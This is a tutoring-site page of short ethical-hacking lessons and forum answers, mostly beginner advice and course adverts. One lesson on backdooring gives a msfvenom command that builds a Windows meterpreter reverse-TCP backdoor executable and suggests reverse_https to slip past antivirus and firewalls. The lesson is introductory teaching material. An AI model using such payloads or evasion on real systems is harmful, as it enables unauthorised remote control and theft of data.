Find the best tutors and institutes for IT Security Management

Find Best IT Security Management Training

Please select a Category.

Please select a Locality.

No matching category found.

No matching Locality found.

Outside India?

Search for topics

IT Security Management Updates

Ask a Question

Post a Lesson

All

All

Lessons

Discussion

Lesson Posted on 04 Jun IT Courses/Malware Analysis IT Courses/ECSA EC-Council Certified Security Analyst IT Courses/Penetration Testing +1 IT Courses/IT Security Management /Ethical Hacking & Cyber Security less

An Introduction to Backdooring

Grandhi Srikanth

Cyber security is the field I love the most. I have Certified Ethical Hacker(C|EH) from EC-Council Cisco...

In the hacking world, backdooring is the way to control a computer remotely. An attacker would trick to install a piece of software which has a backdoor in it on the victim and as soon as he installs it, an attacker can gain access to the computer and personal data. A backdoor would communicate using... read more

In the hacking world, backdooring is the way to control a computer remotely. An attacker would trick to install a piece of software which has a backdoor in it on the victim and as soon as he installs it, an attacker can gain access to the computer and personal data. A backdoor would communicate using the attackers IP and listens to commands from the attacker and execute them.

  • VICTIM ( Listen to Incoming connections)
  • VICTIM
  • VICTIM(Executes COMMAND) --------SEND OUTPUT--------> ATTACKER

Generally, for learning the purpose, we can create a windows backdoor using msfvenom tool.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_Address LPORT=$port_number -f exe > malware.exe

Using the above command on Kali Linux, we can generate windows backdoor,-p is for payload, and we choose reverse_tcp LHOST is for the attacker IP address, LPORT is for the port attacker want to listen. Antivirus can detect these backdoors.

For evasion, there are many technics an attacker can use. Using reverse_https, reverse_dns etc. instead of reverse_tcp. Using reverse_https makes antivirus the traffic(Packets) is HTTPS port:443 related traffic and won't make a notice. Even if antivirus or a firewall inspect the traffic, the packets are encrypted, and so, the backdoor will be undetectable.

There are many ways these can be detected, and this proves how careful one should be while using the internet.

read less
Comments
Dislike Bookmark

Lesson Posted on 04 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security IT Courses/Application Security

Prerequisites To Get Started Into Ethical Hacking

Grandhi Srikanth

Cyber security is the field I love the most. I have Certified Ethical Hacker(C|EH) from EC-Council Cisco...

Getting into ethical hacking as a beginner, one has confusion about where to start. There are many resources but the only question remains in mind for a beginner is "What is the zero level to start?". But, here are some tips for you if you want to get started. Get knowledge on, Networking: OSI,... read more

Getting into ethical hacking as a beginner, one has confusion about where to start. There are many resources but the only question remains in mind for a beginner is "What is the zero level to start?". But, here are some tips for you if you want to get started.

Get knowledge on,

Networking:

  • OSI, TCP/IP models
  • TCP/UDP Differences and Flags
  • Three-way handshake(SYN, SYN&ACK, ACK)
  • Ports and IP, how it works
  • Mostly used port numbers
  • Public and Private addresses
  • Definitions of DHCP, ARP and how they work
  • Subnetting(Just introduction is excellent)

Cryptography:

  • Descriptions of Symmetric and Asymmetric encryptions
  • What is Public key and Private key
  • Hash and Encryption difference
  • HTTPS and why to use SSL/TLS

Programming:

  • "Eeew not C" go for basics of python. Programming is not compulsory, But always preferable.

Other:

  • Get familiar with basic Linux commands.
  • Using Putty or SSH
  • How Server/Client works in networking model.
  • How HTTP protocol works

Again, it is always prefered to know these domains, no need to be an expert. Always remember, Practice while you learn. Learn while you practice.

read less
Comments
Dislike Bookmark

Answered on 24 Jul IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Mithun Verma

Ethical Hacker

for cyber security & ethical hacking course manly qualification is not important but knowledge and IT info. is very important. so in this field mind and IT info is more important to qualification.....
Answers 8 Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 11 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Triad Square Infosec

Training, Consulting and staffing services in the information security domain.

Hi Mohammed , if you are looking for any Cyber security training I can help you with your training done along with the certification which can be completed in 40 hours and it has 19 modules not only you will study from basic to advance but also our instructor will teach you complete practicals. we provide... read more

Hi Mohammed , if you are looking for any Cyber security training I can help you with your training done along with the certification which can be completed in 40 hours and it has 19 modules not only you will study from basic to advance but also our instructor will teach you complete practicals. we provide passing assurance as all our trainers are highly qualified having more than 10-15yrs of work experience in the same. Feel free to reach me on Seven Six two five zereo nine six nine three five / Eight two nine six six two one one four nine. Please visit our website www.triadsquare.com for more information 

 
Email me to sheerin.a at triadsquare.com 

 

read less
Answers 3 Comments
Dislike Bookmark

Lesson Posted on 16 May IT Courses/Computer Networking IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Ethical hacking : Important points for beginners

WiTTyMinds

WiTTyTech makes everybody skilful regarding technology. Its a knowledge hub which guarantees practical...

Dear passionate learners, I am posting below lesson to create enthusiasm among you all for learning ethical hacking . A beginner in Ethical Hacking is always in dilemma. Below are some misconceptions, which are barrier in learning ethical hacking:- 1) Hacking is done for bad purpose. 2)... read more

 

Dear passionate learners,

 

I am posting below lesson to create enthusiasm among you all for learning ethical hacking .

 

A beginner in Ethical Hacking is always in dilemma.

Below are some misconceptions, which are barrier in learning ethical hacking:-

1) Hacking is done for bad purpose.
2) Its done to steal data or money.
3) Hackers are always insecure about their stability and existence.
4) A Computer degree is required to become Ethical hacker.
5) hacking can be done only using a specific tools.


Now, lets see what are some basic knowledge and skills for Ethical Hacking:-

1) Basic Coding & knowledge of programming language.

Above is useful in knowing what a code does,and to know how the logic works.
i.e If a hacker whose intentions are bad and deployed his/her code on a system,in that
scenario we need to know what is the intention of the code.

2) Basic knowledge of Operating System especially Linux.

I would say, this is a must skill for ethical hackers.
Without knowing OS concepts ,its difficult for one to know about running processes,
system reachability,file systems and other protocols etc

 

3) Basic knowledge of networking.

Above is needed in order to know the route followed by packets.
i.e man in the middle attack in the network,phishing etc can be prevented ,if anybody knows the core concept of networking.
A lot of banks wants to know who are the intruders in the network where the server is located.


4) Cross platform execution of tools.

One must know how to execute a tool or code on all the platforms,because the server where we need to find the weakness can be of any platform i.e Windows or Linux.

5) Hacking is also known as finding weaknesses in system.

An ethical hacker finds weakness in system ,in order to prevent from external attack.

6) Basic knowledge of all Communication protocols.

One must know the basic protocols like TCP/UDP and routing protocols like OSPF etc to find weaknesses in system.


7) One must be a passionate and curious about knowing things.

A person who is always curious and passionate can learn easily, how thing works.



Below is analogy to computer system and home.
If anyone knows what are the entry points and exit points in a house,he/she can save the house from external intruders.
Doors and windows in a house are like ports in a computer systems.

 

Below video(which is created by me)  link which i have uploaded in my youtube channel,illustrating the analogy:-

 

https://www.youtube.com/watch?v=8vmJgpgW4E8

 

 

All the best in your learnings .

Regards,

wiTTyMinds Technology

read less
Comments
Dislike Bookmark

Lesson Posted on 16 May IT Courses/IT Security Management /Ethical Hacking & Cyber Security IT Courses/Network Security IT Courses/Networking General +1 IT Courses/Computer Networking less

Ethical Hacking : Important Points for Beginners

WiTTyMinds

WiTTyTech makes everybody skilful regarding technology. Its a knowledge hub which guarantees practical...

Dear passionate learners,I am posting lesson to create enthusiasm among you all for learning ethical hacking.A beginner in Ethical Hacking is always in a dilemma. Below are some misconceptions, which are a barrier to learning ethical hacking:-1) Hacking is done for a bad purpose. 2) Its done to steal... read more

Dear passionate learners,

I am posting lesson to create enthusiasm among you all for learning ethical hacking.

A beginner in Ethical Hacking is always in a dilemma.


Below are some misconceptions, which are a barrier to learning ethical hacking:-

1) Hacking is done for a bad purpose.
2) Its done to steal data or money.
3) Hackers are always insecure about their stability and existence.
4) A Computer degree is required to become an Ethical Hacker.
5) hacking can be done only using specific tools.

Now, let's see what are some basic knowledge and skills for Ethical Hacking:-

1) Basic Coding & knowledge of programming language.

Above is useful in knowing what code does, and to know how the logic works.
i.e. If a hacker whose intentions are bad and deployed his/her code on a system, in that scenario we need to know what is the intention of the code.

2) Basic knowledge of Operating System especially Linux.

I would say, this is a must skill for ethical hackers.
Without knowing OS concepts, it's difficult for one to know about running processes,
system reachability, file systems and other protocols etc

3) Basic knowledge of networking.

Above is needed to know the route followed by packets.
i.e. man in the middle attack on the network, phishing etc. can be prevented, if anybody knows the core concept of networking.
A lot of banks wants to know who are the intruders in the network where the server is located.

4) Cross-platform execution of tools.

One must know how to execute a tool or code on all the platforms because the server where we need to find the weakness can be of any platform.

5) Hacking is also known as finding weaknesses in the system.

An ethical hacker finds a weakness in the system, to prevent the external attack.

6) Basic knowledge of all Communication protocols.

One must know the basic protocols like TCP/UDP and routing protocols like OSPF etc. to find weaknesses in the system.

7) Basic knowledge of Linux and Windows networking Commands, i.e. nmap, nestat etc.

Knowledge of these commands will provide information about the remote host and localhost.

8)Knowledge of Kali Linux, Wireshark/tcpdump etc. is added advantage.

Above provide tools and saves our time in writing an application for hacking.

9) One must be passionate and curious about knowing things.

A person who is always curious and passionate can learn how the thing works.

Below is an analogy to the computer system and home.
If anyone knows what the entry points and exit points in a house are, he can save the house from external intruders.
Doors and windows in a house are like ports in a computer system.

read less
Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Lesson Posted on 16 May IT Courses/Computer Networking IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Ethical hacking : Important points for beginners

Abhay

Dear passionate learners, I am posting lesson to create enthusiasm among you all for learning ethical hacking. A beginner in Ethical Hacking is always in a dilemma. Below are some misconceptions, which are the barrier to learning ethical hacking:- 1) Hacking is done for the wrong purpose.... read more

 

Dear passionate learners,

 

I am posting lesson to create enthusiasm among you all for learning ethical hacking.

 

A beginner in Ethical Hacking is always in a dilemma.

Below are some misconceptions, which are the barrier to learning ethical hacking:-

1) Hacking is done for the wrong purpose.
2) Its done to steal data or money.
3) Hackers are always insecure about their stability and existence.
4) A Computer degree is required to become an Ethical Hacker.
5) hacking can be done only using specific tools.


Now, let's see what are some basic knowledge and skills for Ethical Hacking:-

1) Necessary Coding & knowledge of programming language.

Above is useful in knowing what code does, and to understand how the logic works.
i.e. If a hacker whose intentions are evil and has deployed the code on a system, in that scenario we need to know what is the purpose of the code.

2) Basic knowledge of Operating System especially Linux.

I would say, this is a must skill for ethical hackers.
Without knowing OS concepts, it's difficult for one to know about running processes,
system reachability, file systems and other protocols etc

 

3) Basic knowledge of networking.

Above is needed to know the route followed by packets.
i.e. man in the middle attack on the network, phishing etc. can be prevented, if anybody knows the core concept of networking.
A lot of banks wants to know who are the intruders in the network where the server is located.


4) Cross-platform execution of tools.

One must know how to execute a tool or code on all the platforms because the server where we need to find the weakness can be of any platform, i.e. Windows or Linux.

5) Hacking is also known as finding weaknesses in the system.

An ethical hacker finds the weakness in the system, to prevent the external attack.

6) Basic knowledge of all Communication protocols.

One must know the basic protocols like TCP/UDP and routing protocols like OSPF etc. to find weaknesses in the system.


7) One must be passionate and curious about knowing things.

A person who is always curious and passionate can learn easily, how the thing works.

 

Below is the analogy to the computer system and home.
If anyone knows what the entry points and exit points in a house are, he/she can save the house from external intruders.
Doors and windows in a house are like ports in a computer system.

 

Below video(which is created by me) link which I have uploaded in my youtube channel, illustrating the analogy:-

 

 

 

 

read less
Comments
Dislike Bookmark

Lesson Posted on 14 May IT Courses/IT Security Management /Ethical Hacking & Cyber Security

A Torch for the Green Hats.

Varun Mehta

I have been working in the cyber domain for more than 4 years now, partly as freelance trainer and partly...

How do I become a hacker? I have received this question countless times on formal and informal occasions. I feel the need to put a small sum up on the rules for you. Step 1. Ask yourself the Why. Do I want to be a hacker, or do I want to be "called" a hacker? Understand the difference, having a nerd... read more

How do I become a hacker?


I have received this question countless times on formal and informal occasions. I feel the need to put a small sum up on the rules for you.

Step 1. Ask yourself the Why.

Do I want to be a hacker, or do I want to be "called" a hacker?

Understand the difference, having a nerd trick up your sleeve is excellent to level-up among your friends, but that motivation is not enough, because there will be ups and downs, there will be failures, and there will be monotonous days when for hours you might have to see gibberish data. If you are inspired by the Matrix green code, or by that neighbour in a black hoodie in his bean bag with terminals on laptop jampacked with green text, stop right here. Ask and search your ground-zero motivation.

 

Step 2. Don't say NO to anything.

I love the Metasploit, but I won't deal with the ruby code, I hate the programming stuff.

Really? I don't think you will ever rise from a script kiddie. Never say never, be it SQL, Python, CSS, assembly, or something outrageously alien to you. If you cant bear hundreds and hundreds of lines of code, you are not ready yet. Curiosity never killed the cat, Ignorance did, and Ignorance in cyber world will kill your ambition-cat.

 

Step 3. Patience!

Why the heck am I getting the same compilation error from the past three freaking days!!

Okay, maybe I exaggerated a bit, but this will happen. Things will fall apart, and they won't work and damn! A machine doesn't understand your emotions, well at least not yet. You will have streaks of hours, maybe days, coffee after coffee, stuck with a problem. In those times, have patience. Remember at the root (no pun intended); hacking is a form of Art. And the greatest of artists need off times. Maybe go for a walk, or have a cricket match, you know the drill.

 

Step 4. Focus on what's important.

I am the jack of all trades lol.

Hold on, its nothing to show off about. I would instead wish you be an ace of one and sub-jack of others. You are doing nothing significant if you have got the breadth of network, wireless, system, servers or forensics but the depth of none. Find your specialisation and tear through it. Curiosity will automatically get you the breadth you desire; it's the mind-numbing toil that will take you all the way through the rabbit hole of one.

 

Step 5. Communicate.

Yes, this is it! One of the prime reasons you will enjoy this will be via the communication with your peers, friends or maybe me :)

Talking to a machine day in and out is not an easy deal. Especially if she is not telling you the problem, she is facing. Talk it out! Spring open the queries, doubts and the questions, however silly they are (just not on StackOverflow, the moderators tend to get offended quickly). Communication is one of the original keys of the meaningful human existence. Use it to advantage. Make it worthy!

read less
Comments
Dislike Bookmark

Answered on 20 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Monica Singh

Trainer

You can become certified ethical hacker by doing first the basic training which no Institute otherthan Institute of Information Security will teach . Training from scratch , practical hand on training with certification and placement too with full fledged cybersecurity training . Approach Institute... read more

You can become certified ethical hacker by doing first the basic training which no Institute otherthan Institute of Information Security will teach .  Training from scratch , practical hand on training with certification and placement too with full fledged cybersecurity training .

Approach Institute of Information Security , Chandigarh    

http://www.iisecurity.in/contact-us.php

read less
Answers 8 Comments
Dislike Bookmark

Looking for IT Security Management Training

Find best IT Security Management Training in your locality on UrbanPro.

FIND NOW

Answered on 21 Jun IT Courses/IT Security Management /Ethical Hacking & Cyber Security

Olalekan Admin

Trainer

Qualification is not necessary for learning ethical hacking but web programming and networking background are quite enough for learning ethical hacking. But if one wants to become a professional in this field the person should have strong practical knowledge on how program and network with Microsoft... read more

Qualification is not necessary for learning ethical hacking but web programming and networking background are quite enough for learning ethical hacking. But if one wants to become a professional in this field the person should have strong practical knowledge on how program and network with Microsoft windows and Linux system and for professional foundation CEH training is required.

 

Regards 

Olalekan Admin.

read less
Answers 5 Comments
Dislike Bookmark

About UrbanPro

UrbanPro.com helps you to connect with the best IT Security Management Training in India. Post Your Requirement today and get connected.

Overview

Questions 483

Lessons 23

Total Shares  

+ Follow 2,755 Followers

Related Topics

Top Contributors

Connect with Expert Tutors & Institutes for IT Security Management

x

Ask a Question

Please enter your Question

Please select a Tag

UrbanPro.com is India's largest network of most trusted tutors and institutes. Over 25 lakh students rely on UrbanPro.com, to fulfill their learning requirements across 1,000+ categories. Using UrbanPro.com, parents, and students can compare multiple Tutors and Institutes and choose the one that best suits their requirements. More than 6.5 lakh verified Tutors and Institutes are helping millions of students every day and growing their tutoring business on UrbanPro.com. Whether you are looking for a tutor to learn mathematics, a German language trainer to brush up your German language skills or an institute to upgrade your IT skills, we have got the best selection of Tutors and Training Institutes for you. Read more